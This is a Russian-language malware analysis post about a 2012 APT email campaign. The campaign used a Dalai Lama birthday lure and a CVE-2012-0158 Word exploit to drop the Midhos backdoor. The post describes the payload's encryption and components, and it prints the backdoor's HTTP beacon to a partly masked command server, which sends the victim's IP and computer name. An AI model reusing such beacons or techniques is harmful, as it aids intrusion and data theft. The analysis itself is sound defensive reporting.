Подарок на день рождения Далай-ламы

Недавно мы писали о том, что Далай-лама часто пользуется компьютерами Mac. Но хотя Его Святейшество использует компьютеры Apple, пока еще не все его сторонники перешли на Маки.

Вы спросите, какое это имеет значение? Дело в том, что 6 июля Его Святейшеству исполняется 77 лет. Круглое число, в каком-то смысле. Неудивительно, что уже вовсю идут атаки, эксплуатирующие тему дня рождения Далай-ламы.

Третьего июля мы обнаружили новую APT-кампанию, озаглавленную «Dalai Lama’s birthday on July 6 to be low-key affair» (день рождения Далай-ламы 6 июля пройдет тихо):

Электронное письмо содержит вложение – .DOC-файл, эксплуатирующий уязвимость CVE-2012-0158, как уже было не раз в подобных атаках (см. Новая APT-атака: разработчики эксплойтов не стоят на месте)

На этот раз эксплойт предназначен для компьютеров под управлением Windows.

Шелл-код для платформы x86 в .DOC-файле расшифровывает основное тело бэкдора, зашифрованное блоками по 1 КБ с помощью простого шифра «xor pos + ror 3»:

После расшифровки основного тела бэкдора оно сохраняется на диске под именем CONIME.EXE. Затем этот файл сохраняет на диске динамическую библиотеку (CONIME.DLL) и конфигурационный файл (CONIME.INF). Мы детектируем два компонента бэкдора как Trojan.Win32.Midhos:

CONIME.dll детектируется как Trojan.Win32.Midhos.fuy

CONIME.exe детектируется как Trojan.Win32.Midhos.fuz

DLL-библиотека реализует основной функционал бэкдора через три экспортируемые функции:

• CommunicateToClient

• InstallProgram

• RunProgram

Как и в остальных случаях, конфигурационный файл бэкдора (CONIME.INF) зашифрован:

Однако здесь применен иной алгоритм шифрования – это цикл, выполняющий операцию XOR с переменным ключом.

После расшифровки можно прочитать файл конфигурации бэкдора:

Адрес командного сервера (61.178.77.*) – тот же, что был использован в ходе предыдущей проанализированной нами атаки (см. Новый вариант бэкдора для MacOS X, применяемый в APT-атаках).

Бэкдор пытается установить HTTP-соединение с портом 1080 командного сервера, с серверным модулем, имеющим имя WinData{UWXYZ}.Dll:

Вот HTTP-запрос полностью:

GET http://61.178.77.*:1080/WinData1158.Dll?HELO-STX-2*IP_ADDR*COMPUTERNAME*$ HTTP/1.0

В ответ сервер посылает бэкдору зашифрованные данные, содержащие команды.

После успешной эксплуатации уязвимости пользователю для отвода глаз демонстрируется документ, содержащий статью из индийской газеты The Tribune, Chandigarh. Оригинал статьи подписан Lalit Mohan:

Заключение

Известные личности, такие как Тэнцзин Гьямцхо – нынешний Далай-лама – являются постоянными мишенями APT-атак. Мы ожидаем роста интенсивности подобных атак в связи с днем рождения Далай-ламы, которому 6 июля исполняется 77 лет.

За последний месяц мы получили почти 500 сообщений об обнаружении Trojan.Win32.Midhos – семейства бэкдоров, используемых авторами данной APT атаки.

Подавляющее большинство жертв находится в США, Италии, Канаде, Великобритании и Германии.

Мы не раз указывали на то, что многие из подобных APT-атак (APT – сокращ. Advanced Persistent Threat, или устойчивая угроза повышенной сложности) – не такой уж и «повышенной» сложности. Зачастую они также и не особо «устойчивые» – их весьма оперативно обнаруживают и удаляют с компьютера антивирусные продукты.

Но одно не вызывает сомнений – они настойчивые.